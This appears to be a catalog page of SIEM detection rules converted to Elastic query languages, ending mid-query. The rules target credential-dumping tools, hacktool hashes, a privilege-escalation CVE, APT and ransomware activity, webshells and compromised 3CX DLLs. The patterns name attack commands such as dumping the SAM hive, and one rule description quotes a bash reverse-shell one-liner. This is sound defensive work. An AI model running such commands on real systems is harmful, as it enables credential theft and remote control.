12,781 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK

Detections

Elastic Converted Lucene critical T1003.001 ↗
HackTool - Windows Credential Editor (WCE) Execution
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. It is often used by threat actors for credential dumping and lateral movement within compromised networks.
(Image:(*\\WCE.exe OR *\\WCE64.exe)) OR (Hashes:(*IMPHASH\=136F0A8572C058A96436C82E541E4C41* OR *IMPHASH\=589657C64DDE88533186C39F82FA1F50* OR *IMPHASH\=6BFE09EFCB4FFDE061EBDBAFC4DB84CF* OR *IMPHASH\=7D490037BF450877E6D0287BDCFF8D2E* OR *IMPHASH\=8AB93B061287C79F3088C5BC7E7D97ED* OR *IMPHASH\=A53A02B997935FD8EEDCB5F7ABAB9B9F* OR *IMPHASH\=BA434A7A729EEC20E136CA4C32D6C740* OR *IMPHASH\=BD1D1547DA13C0FCB6C15E86217D5EB8* OR *IMPHASH\=E96A73C7BF33A464C510EDE582318BF2*))
Elastic Converted EQL critical T1003 ↗
Hacktool Execution - Imphash
Detects the execution of different Windows-based hacktools via their import hash (imphash), even if the files have been renamed.
any where Hashes like~ ("*IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932*", "*IMPHASH=3A19059BD7688CB88E70005F18EFC439*", "*IMPHASH=bf6223a49e45d99094406777eb6004ba*", "*IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1*", "*IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC*", "*IMPHASH=F9A28C458284584A93B14216308D31BD*", "*IMPHASH=6118619783FC175BC7EBECFF0769B46E*", "*IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA*", "*IMPHASH=563233BFA169ACC7892451F71AD5850A*", "*IMPHASH=87575CB7A0E0700EB37F2E3668671A08*", "*IMPHASH=13F08707F759AF6003837A150A371BA1*", "*IMPHASH=1781F06048A7E58B323F0B9259BE798B*", "*IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5*", "*IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D*", "*IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2*", "*IMPHASH=713C29B396B907ED71A72482759ED757*", "*IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F*", "*IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E*", "*IMPHASH=8B114550386E31895DFAB371E741123D*", "*IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793*", "*IMPHASH=9D68781980370E00E0BD939EE5E6C141*", "*IMPHASH=B18A1401FF8F444056D29450FBC0A6CE*", "*IMPHASH=CB567F9498452721D77A451374955F5F*", "*IMPHASH=730073214094CD328547BF1F72289752*", "*IMPHASH=17B461A082950FC6332228572138B80C*", "*IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9*", "*IMPHASH=819B19D53CA6736448F9325A85736792*", "*IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E*", "*IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74*", "*IMPHASH=0588081AB0E63BA785938467E1B10CCA*", "*IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C*", "*IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29*", "*IMPHASH=4DA924CF622D039D58BCE71CDF05D242*", "*IMPHASH=E7A3A5C377E2D29324093377D7DB1C66*", "*IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF*", "*IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE*", "*IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4*", "*IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338*", "*IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E*", "*IMPHASH=E6F9D5152DA699934B30DAAB206471F6*", "*IMPHASH=3AD59991CCF1D67339B319B15A41B35D*", "*IMPHASH=FFDD59E0318B85A3E480874D9796D872*", 
"*IMPHASH=0CF479628D7CC1EA25EC7998A92F5051*", "*IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51*", "*IMPHASH=D6D0F80386E1380D05CB78E871BC72B1*", "*IMPHASH=38D9E015591BBFD4929E0D0F47FA0055*", "*IMPHASH=0E2216679CA6E1094D63322E3412D650*", "*IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB*", "*IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798*", "*IMPHASH=11083E75553BAAE21DC89CE8F9A195E4*", "*IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80*", "*IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F*", "*IMPHASH=767637C23BB42CD5D7397CF58B0BE688*", "*IMPHASH=14C4E4C72BA075E9069EE67F39188AD8*", "*IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC*", "*IMPHASH=7D010C6BB6A3726F327F7E239166D127*", "*IMPHASH=89159BA4DD04E4CE5559F132A9964EB3*", "*IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F*", "*IMPHASH=5834ED4291BDEB928270428EBBAF7604*", "*IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38*", "*IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894*", "*IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74*", "*IMPHASH=3DE09703C8E79ED2CA3F01074719906B*", "*IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F*", "*IMPHASH=E96A73C7BF33A464C510EDE582318BF2*", "*IMPHASH=32089B8851BBF8BC2D014E9F37288C83*", "*IMPHASH=09D278F9DE118EF09163C6140255C690*", "*IMPHASH=03866661686829d806989e2fc5a72606*", "*IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d*", "*IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE*", "*IMPHASH=19584675D94829987952432E018D5056*", "*IMPHASH=330768A4F172E10ACB6287B87289D83B*", "*IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313*", "*IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC*", "*IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28*", "*IMPHASH=96DF3A3731912449521F6F8D183279B1*", "*IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46*", "*IMPHASH=51791678F351C03A0EB4E2A7B05C6E17*", "*IMPHASH=25CE42B079282632708FC846129E98A5*", "*IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20*", "*IMPHASH=59223B5F52D8799D38E0754855CBDF42*", "*IMPHASH=81E75D8F1D276C156653D3D8813E4A43*", "*IMPHASH=17244E8B6B8227E57FE709CCAD421420*", "*IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4*", "*IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C*", 
"*IMPHASH=40445337761D80CF465136FAFB1F63E6*", "*IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6*", "*IMPHASH=B50199E952C875241B9CE06C971CE3C1*")
Elastic Converted ES|QL critical T1003 ↗
Hacktool Execution - Imphash
Detects the execution of different Windows-based hacktools via their import hash (imphash), even if the files have been renamed.
from * metadata _id, _index, _version | where Hashes like "*IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932*" or Hashes like "*IMPHASH=3A19059BD7688CB88E70005F18EFC439*" or Hashes like "*IMPHASH=bf6223a49e45d99094406777eb6004ba*" or Hashes like "*IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1*" or Hashes like "*IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC*" or Hashes like "*IMPHASH=F9A28C458284584A93B14216308D31BD*" or Hashes like "*IMPHASH=6118619783FC175BC7EBECFF0769B46E*" or Hashes like "*IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA*" or Hashes like "*IMPHASH=563233BFA169ACC7892451F71AD5850A*" or Hashes like "*IMPHASH=87575CB7A0E0700EB37F2E3668671A08*" or Hashes like "*IMPHASH=13F08707F759AF6003837A150A371BA1*" or Hashes like "*IMPHASH=1781F06048A7E58B323F0B9259BE798B*" or Hashes like "*IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5*" or Hashes like "*IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D*" or Hashes like "*IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2*" or Hashes like "*IMPHASH=713C29B396B907ED71A72482759ED757*" or Hashes like "*IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F*" or Hashes like "*IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E*" or Hashes like "*IMPHASH=8B114550386E31895DFAB371E741123D*" or Hashes like "*IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793*" or Hashes like "*IMPHASH=9D68781980370E00E0BD939EE5E6C141*" or Hashes like "*IMPHASH=B18A1401FF8F444056D29450FBC0A6CE*" or Hashes like "*IMPHASH=CB567F9498452721D77A451374955F5F*" or Hashes like "*IMPHASH=730073214094CD328547BF1F72289752*" or Hashes like "*IMPHASH=17B461A082950FC6332228572138B80C*" or Hashes like "*IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9*" or Hashes like "*IMPHASH=819B19D53CA6736448F9325A85736792*" or Hashes like "*IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E*" or Hashes like "*IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74*" or Hashes like "*IMPHASH=0588081AB0E63BA785938467E1B10CCA*" or Hashes like "*IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C*" or Hashes like "*IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29*" or Hashes like 
"*IMPHASH=4DA924CF622D039D58BCE71CDF05D242*" or Hashes like "*IMPHASH=E7A3A5C377E2D29324093377D7DB1C66*" or Hashes like "*IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF*" or Hashes like "*IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE*" or Hashes like "*IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4*" or Hashes like "*IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338*" or Hashes like "*IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E*" or Hashes like "*IMPHASH=E6F9D5152DA699934B30DAAB206471F6*" or Hashes like "*IMPHASH=3AD59991CCF1D67339B319B15A41B35D*" or Hashes like "*IMPHASH=FFDD59E0318B85A3E480874D9796D872*" or Hashes like "*IMPHASH=0CF479628D7CC1EA25EC7998A92F5051*" or Hashes like "*IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51*" or Hashes like "*IMPHASH=D6D0F80386E1380D05CB78E871BC72B1*" or Hashes like "*IMPHASH=38D9E015591BBFD4929E0D0F47FA0055*" or Hashes like "*IMPHASH=0E2216679CA6E1094D63322E3412D650*" or Hashes like "*IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB*" or Hashes like "*IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798*" or Hashes like "*IMPHASH=11083E75553BAAE21DC89CE8F9A195E4*" or Hashes like "*IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80*" or Hashes like "*IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F*" or Hashes like "*IMPHASH=767637C23BB42CD5D7397CF58B0BE688*" or Hashes like "*IMPHASH=14C4E4C72BA075E9069EE67F39188AD8*" or Hashes like "*IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC*" or Hashes like "*IMPHASH=7D010C6BB6A3726F327F7E239166D127*" or Hashes like "*IMPHASH=89159BA4DD04E4CE5559F132A9964EB3*" or Hashes like "*IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F*" or Hashes like "*IMPHASH=5834ED4291BDEB928270428EBBAF7604*" or Hashes like "*IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38*" or Hashes like "*IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894*" or Hashes like "*IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74*" or Hashes like "*IMPHASH=3DE09703C8E79ED2CA3F01074719906B*" or Hashes like "*IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F*" or Hashes like "*IMPHASH=E96A73C7BF33A464C510EDE582318BF2*" or Hashes like 
"*IMPHASH=32089B8851BBF8BC2D014E9F37288C83*" or Hashes like "*IMPHASH=09D278F9DE118EF09163C6140255C690*" or Hashes like "*IMPHASH=03866661686829d806989e2fc5a72606*" or Hashes like "*IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d*" or Hashes like "*IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE*" or Hashes like "*IMPHASH=19584675D94829987952432E018D5056*" or Hashes like "*IMPHASH=330768A4F172E10ACB6287B87289D83B*" or Hashes like "*IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313*" or Hashes like "*IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC*" or Hashes like "*IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28*" or Hashes like "*IMPHASH=96DF3A3731912449521F6F8D183279B1*" or Hashes like "*IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46*" or Hashes like "*IMPHASH=51791678F351C03A0EB4E2A7B05C6E17*" or Hashes like "*IMPHASH=25CE42B079282632708FC846129E98A5*" or Hashes like "*IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20*" or Hashes like "*IMPHASH=59223B5F52D8799D38E0754855CBDF42*" or Hashes like "*IMPHASH=81E75D8F1D276C156653D3D8813E4A43*" or Hashes like "*IMPHASH=17244E8B6B8227E57FE709CCAD421420*" or Hashes like "*IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4*" or Hashes like "*IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C*" or Hashes like "*IMPHASH=40445337761D80CF465136FAFB1F63E6*" or Hashes like "*IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6*" or Hashes like "*IMPHASH=B50199E952C875241B9CE06C971CE3C1*"
Elastic Converted Lucene critical T1003 ↗
Hacktool Execution - Imphash
Detects the execution of different Windows-based hacktools via their import hash (imphash), even if the files have been renamed.
Hashes:(*IMPHASH\=BCCA3C247B619DCD13C8CDFF5F123932* OR *IMPHASH\=3A19059BD7688CB88E70005F18EFC439* OR *IMPHASH\=bf6223a49e45d99094406777eb6004ba* OR *IMPHASH\=23867A89C2B8FC733BE6CF5EF902F2D1* OR *IMPHASH\=A37FF327F8D48E8A4D2F757E1B6E70BC* OR *IMPHASH\=F9A28C458284584A93B14216308D31BD* OR *IMPHASH\=6118619783FC175BC7EBECFF0769B46E* OR *IMPHASH\=959A83047E80AB68B368FDB3F4C6E4EA* OR *IMPHASH\=563233BFA169ACC7892451F71AD5850A* OR *IMPHASH\=87575CB7A0E0700EB37F2E3668671A08* OR *IMPHASH\=13F08707F759AF6003837A150A371BA1* OR *IMPHASH\=1781F06048A7E58B323F0B9259BE798B* OR *IMPHASH\=233F85F2D4BC9D6521A6CAAE11A1E7F5* OR *IMPHASH\=24AF2584CBF4D60BBE5C6D1B31B3BE6D* OR *IMPHASH\=632969DDF6DBF4E0F53424B75E4B91F2* OR *IMPHASH\=713C29B396B907ED71A72482759ED757* OR *IMPHASH\=749A7BB1F0B4C4455949C0B2BF7F9E9F* OR *IMPHASH\=8628B2608957A6B0C6330AC3DE28CE2E* OR *IMPHASH\=8B114550386E31895DFAB371E741123D* OR *IMPHASH\=94CB940A1A6B65BED4D5A8F849CE9793* OR *IMPHASH\=9D68781980370E00E0BD939EE5E6C141* OR *IMPHASH\=B18A1401FF8F444056D29450FBC0A6CE* OR *IMPHASH\=CB567F9498452721D77A451374955F5F* OR *IMPHASH\=730073214094CD328547BF1F72289752* OR *IMPHASH\=17B461A082950FC6332228572138B80C* OR *IMPHASH\=DC25EE78E2EF4D36FAA0BADF1E7461C9* OR *IMPHASH\=819B19D53CA6736448F9325A85736792* OR *IMPHASH\=829DA329CE140D873B4A8BDE2CBFAA7E* OR *IMPHASH\=C547F2E66061A8DFFB6F5A3FF63C0A74* OR *IMPHASH\=0588081AB0E63BA785938467E1B10CCA* OR *IMPHASH\=0D9EC08BAC6C07D9987DFD0F1506587C* OR *IMPHASH\=BC129092B71C89B4D4C8CDF8EA590B29* OR *IMPHASH\=4DA924CF622D039D58BCE71CDF05D242* OR *IMPHASH\=E7A3A5C377E2D29324093377D7DB1C66* OR *IMPHASH\=9A9DBEC5C62F0380B4FA5FD31DEFFEDF* OR *IMPHASH\=AF8A3976AD71E5D5FDFB67DDB8DADFCE* OR *IMPHASH\=0C477898BBF137BBD6F2A54E3B805FF4* OR *IMPHASH\=0CA9F02B537BCEA20D4EA5EB1A9FE338* OR *IMPHASH\=3AB3655E5A14D4EEFC547F4781BF7F9E* OR *IMPHASH\=E6F9D5152DA699934B30DAAB206471F6* OR *IMPHASH\=3AD59991CCF1D67339B319B15A41B35D* OR *IMPHASH\=FFDD59E0318B85A3E480874D9796D872* OR 
*IMPHASH\=0CF479628D7CC1EA25EC7998A92F5051* OR *IMPHASH\=07A2D4DCBD6CB2C6A45E6B101F0B6D51* OR *IMPHASH\=D6D0F80386E1380D05CB78E871BC72B1* OR *IMPHASH\=38D9E015591BBFD4929E0D0F47FA0055* OR *IMPHASH\=0E2216679CA6E1094D63322E3412D650* OR *IMPHASH\=ADA161BF41B8E5E9132858CB54CAB5FB* OR *IMPHASH\=2A1BC4913CD5ECB0434DF07CB675B798* OR *IMPHASH\=11083E75553BAAE21DC89CE8F9A195E4* OR *IMPHASH\=A23D29C9E566F2FA8FFBB79267F5DF80* OR *IMPHASH\=4A07F944A83E8A7C2525EFA35DD30E2F* OR *IMPHASH\=767637C23BB42CD5D7397CF58B0BE688* OR *IMPHASH\=14C4E4C72BA075E9069EE67F39188AD8* OR *IMPHASH\=3C782813D4AFCE07BBFC5A9772ACDBDC* OR *IMPHASH\=7D010C6BB6A3726F327F7E239166D127* OR *IMPHASH\=89159BA4DD04E4CE5559F132A9964EB3* OR *IMPHASH\=6F33F4A5FC42B8CEC7314947BD13F30F* OR *IMPHASH\=5834ED4291BDEB928270428EBBAF7604* OR *IMPHASH\=5A8A8A43F25485E7EE1B201EDCBC7A38* OR *IMPHASH\=DC7D30B90B2D8ABF664FBED2B1B59894* OR *IMPHASH\=41923EA1F824FE63EA5BEB84DB7A3E74* OR *IMPHASH\=3DE09703C8E79ED2CA3F01074719906B* OR *IMPHASH\=A53A02B997935FD8EEDCB5F7ABAB9B9F* OR *IMPHASH\=E96A73C7BF33A464C510EDE582318BF2* OR *IMPHASH\=32089B8851BBF8BC2D014E9F37288C83* OR *IMPHASH\=09D278F9DE118EF09163C6140255C690* OR *IMPHASH\=03866661686829d806989e2fc5a72606* OR *IMPHASH\=e57401fbdadcd4571ff385ab82bd5d6d* OR *IMPHASH\=84B763C45C0E4A3E7CA5548C710DB4EE* OR *IMPHASH\=19584675D94829987952432E018D5056* OR *IMPHASH\=330768A4F172E10ACB6287B87289D83B* OR *IMPHASH\=885C99CCFBE77D1CBFCB9C4E7C1A3313* OR *IMPHASH\=22A22BC9E4E0D2F189F1EA01748816AC* OR *IMPHASH\=7FA30E6BB7E8E8A69155636E50BF1B28* OR *IMPHASH\=96DF3A3731912449521F6F8D183279B1* OR *IMPHASH\=7E6CF3FF4576581271AC8A313B2AAB46* OR *IMPHASH\=51791678F351C03A0EB4E2A7B05C6E17* OR *IMPHASH\=25CE42B079282632708FC846129E98A5* OR *IMPHASH\=021BCCA20BA3381B11BDDE26B4E62F20* OR *IMPHASH\=59223B5F52D8799D38E0754855CBDF42* OR *IMPHASH\=81E75D8F1D276C156653D3D8813E4A43* OR *IMPHASH\=17244E8B6B8227E57FE709CCAD421420* OR *IMPHASH\=5B76DA3ACDEDC8A5CDF23A798B5936B4* OR 
*IMPHASH\=CB2B65BB77D995CC1C0E5DF1C860133C* OR *IMPHASH\=40445337761D80CF465136FAFB1F63E6* OR *IMPHASH\=8A790F401B29FA87BC1E56F7272B3AA6* OR *IMPHASH\=B50199E952C875241B9CE06C971CE3C1*)
Elastic Converted EQL critical T1068 ↗
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of exploitation of the LPE CVE-2021-41379, which include an msiexec process creating an elevation_service.exe file.
any where Image:"*\\msiexec.exe" and TargetFilename:"C:\\Program Files (x86)\\Microsoft\\Edge\\Application*" and TargetFilename:"*\\elevation_service.exe"
Elastic Converted ES|QL critical T1068 ↗
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of exploitation of the LPE CVE-2021-41379, which include an msiexec process creating an elevation_service.exe file.
from * metadata _id, _index, _version | where ends_with(Image, "\\msiexec.exe") and starts_with(TargetFilename, "C:\\Program Files (x86)\\Microsoft\\Edge\\Application") and ends_with(TargetFilename, "\\elevation_service.exe")
Elastic Converted Lucene critical T1068 ↗
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of exploitation of the LPE CVE-2021-41379, which include an msiexec process creating an elevation_service.exe file.
Image:*\\msiexec.exe AND TargetFilename:C\:\\Program\ Files\ \(x86\)\\Microsoft\\Edge\\Application* AND TargetFilename:*\\elevation_service.exe
Elastic Original ESQL critical
LLM-Based Attack Chain Triage by Host
This rule correlates multiple endpoint security alerts from the same host and uses an LLM to analyze command lines, parent processes, file operations, DNS queries, registry modifications, module loads and MITRE ATT&CK tactics progression to determine if they form a coherent attack chain. The LLM provides a verdict (TP/FP/SUSPICIOUS) with confidence score and summary explanation, helping analysts to prioritize hosts exhibiting corroborated malicious behavior while filtering out benign activity.
Elastic Original ESQL critical
LLM-Based Compromised User Triage by User
This rule correlates multiple security alerts involving the same user across hosts and data sources, then uses an LLM to analyze whether they indicate account compromise. The LLM evaluates alert patterns, MITRE tactics progression, geographic anomalies, and multi-host activity to provide a verdict and confidence score, helping analysts prioritize users exhibiting indicators of credential theft or unauthorized access.
Elastic Converted EQL critical T1059 ↗
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
any where (CommandLine like~ ("*reg.exe save hklm\\sam %temp%\\~reg_sam.save*", "*1q2w3e4r@#$@#$@#$*", "* -hp1q2w3e4 *", "*.dat data03 10000 -p *")) or (CommandLine:"*netstat -aon | find *" and CommandLine:"*ESTA*" and CommandLine:"* > %temp%\\~*") or (CommandLine:"*.255 10 C:\\ProgramData\\IBM\\*" and CommandLine:"*.DAT*") or ((CommandLine:"* /c *" and CommandLine:"* -p 0x*") and (CommandLine like~ ("*C:\\ProgramData\\*", "*C:\\RECYCLER\\*"))) or ((CommandLine:"*rundll32 *" and CommandLine:"*C:\\ProgramData\\*") and (CommandLine like~ ("*.bin,*", "*.tmp,*", "*.dat,*", "*.io,*", "*.ini,*", "*.db,*")))
Elastic Converted ES|QL critical T1059 ↗
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
from * metadata _id, _index, _version | where CommandLine like "*reg.exe save hklm\\sam %temp%\\~reg_sam.save*" or CommandLine like "*1q2w3e4r@#$@#$@#$*" or CommandLine like "* -hp1q2w3e4 *" or CommandLine like "*.dat data03 10000 -p *" or CommandLine like "*netstat -aon | find *" and CommandLine like "*ESTA*" and CommandLine like "* > %temp%\\~*" or CommandLine like "*.255 10 C:\\ProgramData\\IBM\\*" and CommandLine like "*.DAT*" or CommandLine like "* /c *" and CommandLine like "* -p 0x*" and (CommandLine like "*C:\\ProgramData\\*" or CommandLine like "*C:\\RECYCLER\\*") or CommandLine like "*rundll32 *" and CommandLine like "*C:\\ProgramData\\*" and (CommandLine like "*.bin,*" or CommandLine like "*.tmp,*" or CommandLine like "*.dat,*" or CommandLine like "*.io,*" or CommandLine like "*.ini,*" or CommandLine like "*.db,*")
Elastic Converted Lucene critical T1059 ↗
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
(CommandLine:(*reg.exe\ save\ hklm\\sam\ %temp%\\\~reg_sam.save* OR *1q2w3e4r@#$@#$@#$* OR *\ \-hp1q2w3e4\ * OR *.dat\ data03\ 10000\ \-p\ *)) OR (CommandLine:*netstat\ \-aon\ \|\ find\ * AND CommandLine:*ESTA* AND CommandLine:*\ \>\ %temp%\\\~*) OR (CommandLine:*.255\ 10\ C\:\\ProgramData\\IBM\\* AND CommandLine:*.DAT*) OR ((CommandLine:*\ \/c\ * AND CommandLine:*\ \-p\ 0x*) AND (CommandLine:(*C\:\\ProgramData\\* OR *C\:\\RECYCLER\\*))) OR ((CommandLine:*rundll32\ * AND CommandLine:*C\:\\ProgramData\\*) AND (CommandLine:(*.bin,* OR *.tmp,* OR *.dat,* OR *.io,* OR *.ini,* OR *.db,*)))
Elastic Converted EQL critical T1547.001 ↗
Leviathan Registry Key Activity
Detects a registry key used by the Leviathan APT in a Malaysian-focused campaign.
any where TargetObject:"*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd*"
Elastic Converted ES|QL critical T1547.001 ↗
Leviathan Registry Key Activity
Detects a registry key used by the Leviathan APT in a Malaysian-focused campaign.
from * metadata _id, _index, _version | where TargetObject like "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd*"
Elastic Converted Lucene critical T1547.001 ↗
Leviathan Registry Key Activity
Detects a registry key used by the Leviathan APT in a Malaysian-focused campaign.
TargetObject:*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd*
Elastic Converted EQL critical T1059.004 ↗
Linux Reverse Shell Indicator
Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1').
any where Image:"*/bin/bash" and (not (DestinationIp like~ ("127.0.0.1", "0.0.0.0")))
Elastic Converted ES|QL critical T1059.004 ↗
Linux Reverse Shell Indicator
Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1').
from * metadata _id, _index, _version | where ends_with(Image, "/bin/bash") and not (DestinationIp in ("127.0.0.1", "0.0.0.0"))
Elastic Converted Lucene critical T1059.004 ↗
Linux Reverse Shell Indicator
Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1').
Image:*\/bin\/bash AND (NOT (DestinationIp:(127.0.0.1 OR 0.0.0.0)))
Elastic Converted EQL critical T1486 ↗
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
any where CommandLine:"*-i SM-tgytutrc -s*"
Elastic Converted ES|QL critical T1486 ↗
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
from * metadata _id, _index, _version | where CommandLine like "*-i SM-tgytutrc -s*"
Elastic Converted Lucene critical T1486 ↗
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
CommandLine:*\-i\ SM\-tgytutrc\ \-s*
Elastic Converted EQL critical T1505.003 ↗
Mailbox Export to Exchange Webserver
Detects a successful export of an Exchange mailbox to an untypical directory or with an .aspx name suffix, which can be used to place a webshell, or the role assignment needed for it.
any where (("New-MailboxExportRequest" and " -Mailbox ") and ("-FilePath \"\\\\" or ".aspx")) or ("New-ManagementRoleAssignment" and " -Role \"Mailbox Import Export\"" and " -User ")
Elastic Converted Lucene critical T1505.003 ↗
Mailbox Export to Exchange Webserver
Detects a successful export of an Exchange mailbox to an untypical directory or with an .aspx name suffix, which can be used to place a webshell, or the role assignment needed for it.
((*New\-MailboxExportRequest* AND *\ \-Mailbox\ *) AND (*\-FilePath\ \"\\\\* OR *.aspx*)) OR (*New\-ManagementRoleAssignment* AND *\ \-Role\ \"Mailbox\ Import\ Export\"* AND *\ \-User\ *)
Elastic Converted EQL critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp.
any where Hashes like~ ("*SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896*", "*SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429*", "*MD5=74BC2D0B6680FAA1A5A76B27E5479CBC*", "*SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03*", "*SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E*", "*MD5=82187AD3F0C6C225E2FBA0C867280CC9*", "*SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952*", "*SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30*", "*MD5=11BC82A9BD8297BD0823BCE5D6202082*", "*SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423*", "*SHA1=3B3E778B647371262120A523EB873C20BB82BEAF*", "*MD5=7FAEA2B01796B80D180399040BB69835*")
Elastic Converted ES|QL critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp.
from * metadata _id, _index, _version | where Hashes like "*SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896*" or Hashes like "*SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429*" or Hashes like "*MD5=74BC2D0B6680FAA1A5A76B27E5479CBC*" or Hashes like "*SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03*" or Hashes like "*SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E*" or Hashes like "*MD5=82187AD3F0C6C225E2FBA0C867280CC9*" or Hashes like "*SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952*" or Hashes like "*SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30*" or Hashes like "*MD5=11BC82A9BD8297BD0823BCE5D6202082*" or Hashes like "*SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423*" or Hashes like 